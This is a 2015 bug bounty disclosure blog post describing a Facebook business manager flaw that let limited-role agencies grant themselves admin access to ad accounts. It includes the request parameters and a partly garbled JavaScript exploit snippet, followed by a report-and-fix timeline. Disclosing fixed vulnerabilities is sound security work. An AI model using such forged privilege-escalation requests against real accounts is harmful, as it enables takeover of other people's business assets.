Sunday, March 15, 2015

Bypass ad account roles vulnerability 2015

  1 comment

facebook exploit 2015

I discovered a vulnerability in Facebook that allowed a normal user in ad account to get unauthorized admin access in that ad account

admins in ad account  can add any user to their ad account with these 3 type of  role :

  1. admin
  2. advertiser
  3. analyst
read more about these roles link

Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from

in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)

the vulnerability that I found, allow these agencies with normal role(2,3)  change their own access to admin!

Scenario :

I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!


with analyst permission in any ad account send this request :

request url :

request body :

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]

Exploit :

var Xhr;
Xhr = new XMLHttpRequest ();"POST","/ads/manage/settings/permissions/?action=add_user",true);
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
p += "fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
__ACCID__ = ad account id
__USERID__ = this user will be new admin ;)
__PERM__ = permission (1001,1002,1003)

POC : 

 I removed some section that used userid or email


  •  Mar 14, 2015 01:27am: Initial report
  •  Mar 17, 2015 03:35am: Bug acknowledged by security team
  •  Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability fixed
  •  Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with a $8000.

1 comment :